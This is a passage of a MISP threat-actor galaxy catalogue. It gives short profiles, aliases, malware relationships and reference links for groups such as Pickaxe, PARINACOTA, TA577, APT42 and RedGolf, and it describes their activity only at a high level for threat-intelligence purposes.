https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

Pickaxe

Prying Libra, also known as Pickaxe, is a threat actor active since at least August 2017, and continues to remain active to this day. The adversary’s goal is to install and maintain a popular cryptocurrency miner on the victim’s machine. The miner in question is an open-source tool named XMRig that generates the Monero cryptocurrency. Malware is delivered via downloads through the popular Adfly advertisement platform. Users are often mislead into clicking on a malicious advertisement that results in the payload being delivered to the victim. Once installed, the malware leverages VBS scripts and redirection services, such as bitly, to ultimately download and execute XMRig. Over 15 million confirmed victims have been discovered to be infected in recent campaigns, with actual numbers likely to be between 30-45 million victims. The victims are found across the globe, with high concentrations in Thailand, Vietnam, Egypt, Indonesia, and Turkey.

The tag is: misp-galaxy:threat-actor="Pickaxe"

Pickaxe is also known as:

  • Prying Libra

Table 12137. Table References

Links

https://unit42.paloaltonetworks.com/atoms/pryinglibra/

Watchdog

Thief Libra is a cloud-focused threat group that has a history of cryptojacking operations as well as cloud service platform credential scraping. They were first known to operate on January 27, 2019. They use a variety of custom build Go Scripts as well as repurposed cryptojacking scripts from other groups including TeamTNT. They are currently considered to be an opportunistic threat group that targets exposed cloud instances and applications.

The tag is: misp-galaxy:threat-actor="Watchdog"

Watchdog is also known as:

  • Thief Libra

Table 12138. Table References

Links

https://unit42.paloaltonetworks.com/atoms/thieflibra/

Returned Libra

Returned Libra, also known as 8220 Mining Group, is a cloud threat actor group that has been active since at least 2017. Tools commonly employed during their operations are PwnRig or DBUsed which are customized variants of the XMRig Monero mining software. The Returned Libra mining group is believed to have originated from a GitHub fork of the Rocke group’s software. Returned Libra has elevated its mining operations with the use of cloud service platform credential scrapping.

The tag is: misp-galaxy:threat-actor="Returned Libra"

Returned Libra is also known as:

  • 8220 Mining Group

Table 12139. Table References

Links

https://unit42.paloaltonetworks.com/atoms/returnedlibra/

SLIME29

The tag is: misp-galaxy:threat-actor="SLIME29"

Table 12141. Table References

Links

https://i.blackhat.com/Asia-22/Friday-Materials/AS-22-Li-To-Loot-Or-Not-To-Loot-That-Is-Not-a-Question.pdf

GOBLIN PANDA

Goblin Panda is one of a handful of elite Chinese advanced persistent threat (APT) groups. Most Chinese APTs target the United States and NATO, but Goblin Panda focuses primarily on Southeast Asia.

The tag is: misp-galaxy:threat-actor="GOBLIN PANDA"

GOBLIN PANDA is also known as:

  • Conimes

  • Cycldek

Table 12142. Table References

Links

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/

https://securelist.com/cycldek-bridging-the-air-gap/97157/

https://www.fortinet.com/blog/threat-research/cta-security-playbook—​goblin-panda.html

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://cyberthreat.thalesgroup.com/sites/default/files/2022-05/THALES%20THREAT%20HANDBOOK%202022%20Light%20Version_1.pdf

TA558

Since 2018, security researchers tracked a financially-motivated cybercrime actor, TA558, targeting hospitality, travel, and related industries located in Latin America and sometimes North America, and western Europe. The actor sends malicious emails written in Portuguese, Spanish, and sometimes English. The emails use reservation-themed lures with business-relevant themes such as hotel room bookings. The emails may contain malicious attachments or URLs aiming to distribute one of at least 15 different malware payloads.

The tag is: misp-galaxy:threat-actor="TA558"

PARINACOTA

One actor that has emerged in this trend of human-operated attacks is an active, highly adaptive group that frequently drops Wadhrama as payload. PARINACOTA impacts three to four organizations every week and appears quite resourceful: during the 18 months that we have been monitoring it, we have observed the group change tactics to match its needs and use compromised machines for various purposes, including cryptocurrency mining, sending spam emails, or proxying for other attacks. The group’s goals and payloads have shifted over time, influenced by the type of compromised infrastructure, but in recent months, they have mostly deployed the Wadhrama ransomware. The group most often employs a smash-and-grab method, whereby they attempt to infiltrate a machine in a network and proceed with subsequent ransom in less than an hour. There are outlier campaigns in which they attempt reconnaissance and lateral movement, typically when they land on a machine and network that allows them to quickly and easily move throughout the environment. PARINACOTA’s attacks typically brute forces their way into servers that have Remote Desktop Protocol (RDP) exposed to the internet, with the goal of moving laterally inside a network or performing further brute-force activities against targets outside the network. This allows the group to expand compromised infrastructure under their control. Frequently, the group targets built-in local administrator accounts or a list of common account names. In other instances, the group targets Active Directory (AD) accounts that they compromised or have prior knowledge of, such as service accounts of known vendors. The group adopted the RDP brute force technique that the older ransomware called Samas (also known as SamSam) infamously used. Other malware families like GandCrab, MegaCortext, LockerGoga, Hermes, and RobbinHood have also used this method in targeted ransomware attacks. PARINACOTA, however, has also been observed to adapt to any path of least resistance they can utilize. For instance, they sometimes discover unpatched systems and use disclosed vulnerabilities to gain initial access or elevate privileges.

The tag is: misp-galaxy:threat-actor="PARINACOTA"

PARINACOTA is also known as:

  • Wine Tempest

PARINACOTA has relationships with:

  • uses: misp-galaxy:ransomware="Wadhrama" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="PARINACOTA" with estimative-language:likelihood-probability="almost-certain"

  • similar: misp-galaxy:microsoft-activity-group="Wine Tempest" with estimative-language:likelihood-probability="likely"

Table 12143. Table References

Links

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

Red Dev 17

In 2021, PwC started tracking a series of intrusions under the moniker of Red Dev 17 that they assess were highly likely conducted by a China-based threat actor. Their analysis suggests Red Dev 17 has been active since at least 2017. Red Dev 17’s observed targets are mainly in India, and include the Indian military, a multinational India-based technology company, and a state energy company. They assess that it is highly probable that the threat actor behind intrusions associated with Red Dev 17 is also responsible for the campaign known in open source as Operation NightScout. Red Dev 17 is a user of the 8.t document weaponisation framework (also known as RoyalRoad), and abuses benign utilities such as Logitech or Windows Defender binaries to sideload and execute Chinoxy or PoisonIvy variants on victim systems. They identified capability and infrastructure links between Red Dev 17 and the threat actor they call Red Hariasa (aka FunnyDream APT), as well as infrastructure overlaps with Red Wendigo (aka Icefog, RedFoxtrot), and with ShadowPad C2 servers. At this time, they do not have sufficient evidence to directly link Red Dev 17 to any of these threat actors. However, They assess with realistic probability that Red Dev 17 operates within a cluster of threat actors that share tools and infrastructure, as well as a strong targeting focus on Southeast Asia and Central Asia.

The tag is: misp-galaxy:threat-actor="Red Dev 17"

Table 12144. Table References

Links

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/

Aoqin Dragon

SentinelLabs has uncovered a cluster of activity beginning at least as far back as 2013 and continuing to the present day, primarily targeting organizations in Southeast Asia and Australia. They assess that the threat actor’s primary focus is espionage and relates to targets in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. We track this activity as 'Aoqin Dragon'. The threat actor has a history of using document lures with pornographic themes to infect users and makes heavy use of USB shortcut techniques to spread the malware and infect additional targets. Attacks attributable to Aoqin Dragon typically drop one of two backdoors, Mongall and a modified version of the open source Heyoka project.

The tag is: misp-galaxy:threat-actor="Aoqin Dragon"

Aoqin Dragon is also known as:

  • UNC94

Table 12145. Table References

Links

https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/

https://khonggianmang.vn/uploads/CB_941_Canhbao_APT_36c5a857fa.pdf

DangerousSavanna

Malicious campaign called DangerousSavanna has been targeting multiple major financial service groups in French-speaking Africa for the last two years. The threat actors behind this campaign use spear-phishing as a means of initial infection, sending emails with malicious attachments to the employees of financial institutions in at least five different French-speaking countries: Ivory Coast, Morocco, Cameroon, Senegal, and Togo. DangerousSavanna tends to install relatively unsophisticated software tools in the infected environments. These tools are both self-written and based on open-source projects such as Metasploit, PoshC2, DWservice, and AsyncRAT. The threat actors’ creativity is on display in the initial infection stage, as they persistently pursue the employees of the targeted companies, constantly changing infection chains that utilize a wide range of malicious file types, from self-written executable loaders and malicious documents, to ISO, LNK, JAR and VBE files in various combinations. The evolving infection chains by the threat actor reflect the changes in the threat landscape seen over the past few years as infection vectors became more and more sophisticated and diverse.

The tag is: misp-galaxy:threat-actor="DangerousSavanna"

Table 12146. Table References

Links

https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/

Hezb

Hezb is a group deploying cryptominers when new exploit are available for public facing vulnerabilities. The name is after the miner process they deploy.

The tag is: misp-galaxy:threat-actor="Hezb"

Hezb is also known as:

  • Mimo

Table 12147. Table References

Links

https://www.pwndefend.com/2022/06/04/cve-2022-26134-honeypot-payload-analysis-example/

https://asec.ahnlab.com/en/60440/

NoName057(16)

NoName057(16) is performing DDoS attacks on websites belonging to governments, news agencies, armies, suppliers, telecommunications companies, transportation authorities, financial institutions, and more in Ukraine and neighboring countries supporting Ukraine, like Ukraine itself, Estonia, Lithuania, Norway, and Poland.

The tag is: misp-galaxy:threat-actor="NoName057(16)"

NoName057(16) is also known as:

  • NoName057

  • NoName05716

  • 05716nnm

  • Nnm05716

Table 12148. Table References

Links

https://decoded.avast.io/martinchlumecky/bobik/

https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/

https://www.gov.pl/web/special-services/russian-cyberattacks

BITWISE SPIDER

BITWISE SPIDER has recently and quickly become a significant player in the big game hunting (BGH) landscape. Their dedicated leak site (DLS) has received the highest number of victims posted each month since July 2021 compared to other adversary DLSs due to the growing popularity and effectiveness of LockBit 2.0.

The tag is: misp-galaxy:threat-actor="BITWISE SPIDER"

BITWISE SPIDER has relationships with:

  • uses: misp-galaxy:ransomware="LockBit" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="LockBit (Windows)" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="LockBit (ELF)" with estimative-language:likelihood-probability="likely"

Table 12149. Table References

Links

https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/

https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/

https://security.packt.com/understanding-lockbit/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit

Void Balaur

Void Balaur is a highly active hack-for-hire / cyber mercenary group with a wide range of known target types across the globe. Their services have been observed for sale to the public online since at least 2016. Services include the collection of private data and access to specific online email and social media services, such as Gmail, Outlook, Telegram, Yandex, Facebook, Instagram, and business emails.

The tag is: misp-galaxy:threat-actor="Void Balaur"

Table 12150. Table References

Links

https://www.sentinelone.com/labs/the-sprawling-infrastructure-of-a-careless-mercenary/

https://blog.google/threat-analysis-group/countering-hack-for-hire-groups/

https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf

https://www.amnesty.org/en/latest/research/2020/03/targeted-surveillance-attacks-in-uzbekistan-an-old-threat-with-new-techniques/

https://equalit.ie/deflect-labs-report-6/

APT-C-60

APT-C-60

The tag is: misp-galaxy:threat-actor="APT-C-60"

APT-C-60 is also known as:

  • APT-Q-12

Table 12151. Table References

Links

https://mp.weixin.qq.com/s/Hzq4_tWmunDpKfHTlZNM-A

https://cert.360.cn/report/detail?id=6c9a1b56e4ceb84a8ab9e96044429adc

RomCom

ROMCOM is an evolving and sophisticated threat actor group that has been using the malware tool ROMCOM for espionage and financially motivated attacks. They have targeted organizations in Ukraine and NATO countries, including military personnel, government agencies, and political leaders. The ROMCOM backdoor is capable of stealing sensitive information and deploying other malware, showcasing the group’s adaptability and growing sophistication.

The tag is: misp-galaxy:threat-actor="RomCom"

RomCom is also known as:

  • Storm-0978

Table 12152. Table References

Links

https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass

https://blogs.blackberry.com/en/2022/10/unattributed-romcom-threat-actor-spoofing-popular-apps-now-hits-ukrainian-militaries

https://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html

https://labs.k7computing.com/index.php/romcom-rat-not-your-typical-love-story/

https://blogs.blackberry.com/en/2023/07/decoding-romcom-behaviors-and-opportunities-for-detection

https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html

GOLD PRELUDE

GOLD PRELUDE is a financially motivated cybercriminal threat group that operates the SocGholish (aka FAKEUPDATES) malware distribution network. GOLD PRELUDE operates a large global network of compromised websites, frequently running vulnerable content management systems (CMS), that redirect into a malicious traffic distribution system (TDS). The TDS, which researchers at Avast have named Parrot TDS, uses opaque criteria to select victims to serve a fake browser update page. These pages, which are customized to the specific visiting browser software, download the JavaScript-based SocGholish payload frequently embedded within a compressed archive.

The tag is: misp-galaxy:threat-actor="GOLD PRELUDE"

GOLD PRELUDE is also known as:

  • TA569

  • UNC1543

GOLD PRELUDE has relationships with:

  • uses: misp-galaxy:tool="FakeUpdates" with estimative-language:likelihood-probability="likely"

Table 12153. Table References

Links

https://www.secureworks.com/research/threat-profiles/gold-prelude

BazarCall

BazarCall campaigns forgo malicious links or attachments in email messages in favor of phone numbers that recipients are misled into calling. It’s a technique reminiscent of vishing and tech support scams where potential victims are being cold called by the attacker, except in BazarCall’s case, targeted users must dial the number. And when they do, the users are connected with actual humans on the other end of the line, who then provide step-by-step instructions for installing malware into their devices.

The tag is: misp-galaxy:threat-actor="BazarCall"

BazarCall is also known as:

  • BazzarCall

  • BazaCall

Table 12154. Table References

Links

https://www.trellix.com/en-us/about/newsroom/stories/research/evolution-of-bazarcall-social-engineering-tactics.html

https://www.microsoft.com/en-us/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/

Evasive Panda

Evasive Panda is an APT group that has been active since at least 2012, conducting cyberespionage targeting individuals, government institutions and organizations.

The tag is: misp-galaxy:threat-actor="Evasive Panda"

Evasive Panda is also known as:

  • BRONZE HIGHLAND

Table 12155. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/

https://vb2020.vblocalhost.com/uploads/VB2020-43.pdf

https://www.virusbulletin.com/virusbulletin/2014/02/needle-haystack

TAG-53

A Russia-linked threat actor tracked as TAG-53 is running phishing campaigns impersonating various defense, aerospace, and logistic companies, according to The Record by Recorded Future. Recorded Future’s Insikt Group identified overlaps with a threat actor tracked by other companies as Callisto Group, COLDRIVER, and SEABORGIUM.

The tag is: misp-galaxy:threat-actor="TAG-53"

TAG-53 has relationships with:

  • overlaps: misp-galaxy:threat-actor="Callisto" with estimative-language:likelihood-probability="likely"

Table 12156. Table References

Links

https://blog.knowbe4.com/russian-threat-actor-impersonates-aerospace-and-defense-companies

https://www.recordedfuture.com/exposing-tag-53-credential-harvesting-infrastructure-for-russia-aligned-espionage-operations?utm_campaign=PostBeyond&utm_source=Twitter&utm_medium=359877&utm_term=Exposing+TAG-53%E2%80%99s+Credential+Harvesting+Infrastructure+Used+for+Russia-Aligned+Espionage+Operations

https://go.recordedfuture.com/hubfs/reports/cta-2022-1205.pdf

Malteiro

This group of cybercriminals is named Malteiroby SCILabs, they operate and distribute the URSA/Mispadu banking trojan.

The tag is: misp-galaxy:threat-actor="Malteiro"

Malteiro has relationships with:

  • delivers: misp-galaxy:banker="Malteiro" with estimative-language:likelihood-probability="likely"

Table 12157. Table References

Links

https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/

https://blog.scilabs.mx/cyber-threat-profile-malteiro/

Moskalvzapoe

The tag is: misp-galaxy:threat-actor="Moskalvzapoe"

Moskalvzapoe is also known as:

  • MAN1

  • TA511

Moskalvzapoe has relationships with:

  • uses: misp-galaxy:malpedia="Hancitor" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:mitre-malware="Hancitor - S0499" with estimative-language:likelihood-probability="very-likely"

Table 12158. Table References

Links

https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618

https://vixra.org/abs/1902.0257

https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/

https://unit42.paloaltonetworks.com/threat-brief-hancitor-actors/

TA570

One of the most active Qbot malware affiliates, Proofpoint has tracked the large cybercrime threat actor TA570 since 2018.

The tag is: misp-galaxy:threat-actor="TA570"

TA570 is also known as:

  • DEV-0450

TA570 has relationships with:

  • uses: misp-galaxy:malpedia="QakBot" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:mitre-malware="QakBot - S0650" with estimative-language:likelihood-probability="very-likely"

Table 12159. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://therecord.media/hackers-using-follina-windows-zero-day-to-spread-qbot-malware/

https://isc.sans.edu/diary/TA570+Qakbot+Qbot+tries+CVE202230190+Follina+exploit+msmsdt/28728

https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

TA575

TA575 is a Dridex affiliate tracked by Proofpoint since late 2020. This group distributes malware such as Dridex, Qakbot, and WastedLocker via malicious URLs, Office attachments, and password-protected files. On average, TA575 distributes almost 4,000 messages per campaign impacting hundreds of organizations.

The tag is: misp-galaxy:threat-actor="TA575"

TA575 has relationships with:

  • uses: misp-galaxy:malpedia="Dridex" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:mitre-malware="Dridex - S0384" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:mitre-malware="QakBot - S0650" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:malpedia="QakBot" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:malpedia="WastedLocker" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:mitre-malware="WastedLocker - S0612" with estimative-language:likelihood-probability="very-likely"

Table 12160. Table References

Links

https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware

https://www.proofpoint.com/us/blog/threat-insight/ta575-uses-squid-game-lures-distribute-dridex-malware

https://www.zdnet.com/article/ta575-criminal-group-using-squid-game-lures-for-dridex-malware/

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

TA577

TA577 is a prolific cybercrime threat actor tracked by Proofpoint since mid-2020. This actor conducts broad targeting across various industries and geographies, and Proofpoint has observed TA577 deliver payloads including Qbot, IcedID, SystemBC, SmokeLoader, Ursnif, and Cobalt Strike.

The tag is: misp-galaxy:threat-actor="TA577"

TA577 is also known as:

  • Hive0118

TA577 has relationships with:

  • uses: misp-galaxy:malpedia="QakBot" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="QakBot - S0650" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="IcedID" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="SystemBC" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="SmokeLoader" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="Snifula" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="Cobalt Strike" with estimative-language:likelihood-probability="likely"

Table 12161. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html

https://www.itpro.com/security/ransomware/359919/ransomware-criminals-look-to-other-hackers-to-provide-them-with-network

https://exchange.xforce.ibmcloud.com/threat-group/guid:1dda890fa2662ed26b451c703e922315

TA2536

TA2536, which has been active since at least 2015, is likely Nigerian based on its unique linguistic style, tactics and tools. It uses keyloggers such as HawkEye and distinctive stylometric features in typo-squatted domains that resemble legitimate names and the use of recurring names and substrings in email addresses.

The tag is: misp-galaxy:threat-actor="TA2536"

TA2536 has relationships with:

  • uses: misp-galaxy:malpedia="Nanocore RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="Agent Tesla" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="Remcos" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="LokiBot" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="Formbook" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="HawkEye Keylogger" with estimative-language:likelihood-probability="likely"

Table 12162. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/dtpacker-net-packer-curious-password-1

DEV-0147

DEV-0147 is a China-based cyber espionage actor was observed compromising diplomatic targets in South America, a notable expansion of the group’s data exfiltration operations that traditionally targeted gov’t agencies and think tanks in Asia and Europe. DEV-0147 is known to use tools like ShadowPad, a remote access trojan associated with other China-based actors, to maintain persistent access, and QuasarLoader, a webpack loader, to deploy additional malware. DEV-0147’s attacks in South America included post-exploitation activity involving the abuse of on-premises identity infrastructure for recon and lateral movement, and the use of Cobalt Strike for command and control and data exfiltration.

The tag is: misp-galaxy:threat-actor="DEV-0147"

Table 12163. Table References

Links

https://twitter.com/MsftSecIntel/status/1625181255754039318

TA406

TA406 is engaging in malware distribution, phishing, intelligence collection, and cryptocurrency theft, resulting in a wide range of criminal activities.

The tag is: misp-galaxy:threat-actor="TA406"

TA406 has relationships with:

  • part-of: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

Table 12164. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/triple-threat-north-korea-aligned-ta406-scams-spies-and-steals

APT42

Iranian state-sponsored cyber espionage group tasked with conducting information collection and surveillance operations against individuals and organizations of strategic interest to the Iranian government.

The tag is: misp-galaxy:threat-actor="APT42"

APT42 is also known as:

  • UNC788

  • CALANQUE

APT42 has relationships with:

  • similar: misp-galaxy:threat-actor="APT35" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

Table 12165. Table References

Links

https://www.mandiant.com/resources/blog/apt42-charms-cons-compromises

https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf

TA453

TA453 has employed the use of compromised accounts, malware, and confrontational lures to go after targets with a range of backgrounds from medical researchers to realtors to travel agencies.

The tag is: misp-galaxy:threat-actor="TA453"

TA453 has relationships with:

  • similar: misp-galaxy:threat-actor="APT42" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="APT35" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

Table 12166. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/ta453-refuses-be-bound-expectations

https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential

Chamelgang

In Q2 2021, the PT Expert Security Center incident response team conducted an investigation in an energy company. The investigation revealed that the company’s network had been compromised by an unknown group for the purpose of data theft. They gave the group the name ChamelGang (from the word "chameleon"), because the group disguised its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google.

The tag is: misp-galaxy:threat-actor="Chamelgang"

Chamelgang has relationships with:

  • uses: misp-galaxy:malpedia="DoorMe" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="Cobalt Strike" with estimative-language:likelihood-probability="likely"

Table 12167. Table References

Links

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/

Karakurt

Karakurt actors have employed a variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation. Karakurt victims have not reported encryption of compromised machines or files; rather, Karakurt actors have claimed to steal data and threatened to auction it off or release it to the public unless they receive payment of the demanded ransom. Known ransom demands have ranged from $25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim.

The tag is: misp-galaxy:threat-actor="Karakurt"

Karakurt is also known as:

  • Karakurt Lair

Karakurt has relationships with:

  • uses: misp-galaxy:malpedia="Cobalt Strike" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="MimiKatz" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:rat="AnyDesk" with estimative-language:likelihood-probability="likely"

Table 12168. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-152a

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

https://www.accenture.com/us-en/blogs/cyber-defense/karakurt-threat-mitigation

DEV-0270

Microsoft threat intelligence teams have been tracking multiple ransomware campaigns and have tied these attacks to DEV-0270, also known as Nemesis Kitten, a sub-group of Iranian actor PHOSPHORUS. Microsoft assesses with moderate confidence that DEV-0270 conducts malicious network operations, including widespread vulnerability scanning, on behalf of the government of Iran.

The tag is: misp-galaxy:threat-actor="DEV-0270"

DEV-0270 is also known as:

  • Nemesis Kitten

  • Storm-0270

DEV-0270 has relationships with:

  • part-of: misp-galaxy:threat-actor="APT35" with estimative-language:likelihood-probability="likely"

Table 12169. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/

Prophet Spider

PROPHET SPIDER is an eCrime actor, active since at least May 2017, that primarily gains access to victims by compromising vulnerable web servers, which commonly involves leveraging a variety of publicly disclosed vulnerabilities. The adversary has likely functioned as an access broker — handing off access to a third party to deploy ransomware — in multiple instances.

The tag is: misp-galaxy:threat-actor="Prophet Spider"

Prophet Spider is also known as:

  • GOLD MELODY

  • UNC961

Prophet Spider has relationships with:

  • uses: misp-galaxy:malpedia="Egregor" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="Mount Locker" with estimative-language:likelihood-probability="likely"

Table 12170. Table References

Links

https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/

https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/

https://www.secureworks.com/research/gold-melody-profile-of-an-initial-access-broker

https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated

TA866

According to Proofpoint, TA866 is a newly identified threat actor that distributes malware via email utilizing both commodity and custom tools. While most of the activity observed occurred since October 2022, Proofpoint researchers identified multiple activity clusters since 2019 that overlap with TA866 activity. Most of the activity recently observed by Proofpoint suggests recent campaigns are financially motivated, however assessment of historic related activities suggests a possible, additional espionage objective.

The tag is: misp-galaxy:threat-actor="TA866"

TA866 has relationships with:

  • uses: misp-galaxy:tool="WasabiSeed" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="Screenshotter" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:stealer="Rhadamanthys" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="AHK Bot" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tds="404 TDS" with estimative-language:likelihood-probability="likely"

Table 12171. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/screentime-sometimes-it-feels-like-somebodys-watching-me

Anonymous Sudan

Since January 23, 2023, a threat actor identifying as "Anonymous Sudan" has been conducting denial of service (DDoS) attacks against multiple organizations in Sweden. This group claims to be "hacktivists," politically motivated hackers from Sudan. According to Truesec’s report, the threat actor has nothing to do with the online activists collectively known as Anonymous.

The tag is: misp-galaxy:threat-actor="Anonymous Sudan"

Table 12172. Table References

Links

https://files.truesec.com/hubfs/Reports/Anonymous%20Sudan%20-%20Publish%201.2%20-%20a%20Truesec%20Report.pdf

https://www.truesec.com/hub/blog/what-is-anonymous-sudan

RedGolf

Recorded Future’s Insikt Group has identified a large cluster of new operational infrastructure associated with use of the custom Windows and Linux backdoor KEYPLUG. We attribute this activity to a threat activity group tracked as RedGolf, which is highly likely to be a Chinese state-sponsored group. RedGolf closely overlaps with threat activity reported in open sources under the aliases APT41/BARIUM and has likely carried out state-sponsored espionage activity in parallel with financially motivated operations for personal gain from at least 2014 onward.

The tag is: misp-galaxy:threat-actor="RedGolf"

RedGolf has relationships with:

  • overlaps: misp-galaxy:threat-actor="APT41" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="PlugX" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="Cobalt Strike" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:threat-actor="APT41" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="KEYPLUG" with estimative-language:likelihood-probability="likely"

Table 12173. Table References

Links

https://go.recordedfuture.com/hubfs/reports/cta-2023-0330.pdf

https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer

APT43

  • APT43 is a prolific cyber operator that supports the interests of the North Korean regime. The group combines moderately-sophisticated technical capabilities with aggressive social engineering tactics, especially against South Korean and U.S.-based government organizations, academics, and think tanks focused on Korean peninsula geopolitical issues.

  • In addition to its espionage campaigns, we believe APT43 funds itself through cybercrime operations to support its primary mission of collecting strategic intelligence.

  • The group creates numerous spoofed and fraudulent personas for use in social engineering, as well as cover identities for purchasing operational tooling and infrastructure.

  • APT43 has collaborated with other North Korean espionage operators on multiple operations, underscoring the major role APT43 plays in the regime’s cyber apparatus.

The tag is: misp-galaxy:threat-actor="APT43"

Table 12174. Table References

Links

https://www.mandiant.com/resources/blog/apt43-north-korea-cybercrime-espionage

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

Hagga

Hagga is believed to have been using Agent Tesla, 2021’s sixth most prevalent malware, to steal sensitive information from his victims since the latter part of 2021.

The tag is: misp-galaxy:threat-actor="Hagga"

Hagga is also known as:

  • Aggah

  • TH-157

Hagga has relationships with:

  • uses: misp-galaxy:tool="Agent Tesla" with estimative-language:likelihood-probability="likely"

Table 12175. Table References

Links

https://www.team-cymru.com/post/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor

https://otx.alienvault.com/pulse/62cfe4ef3415be5f83be81d1

https://team-cymru.com/blog/2022/07/12/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor/

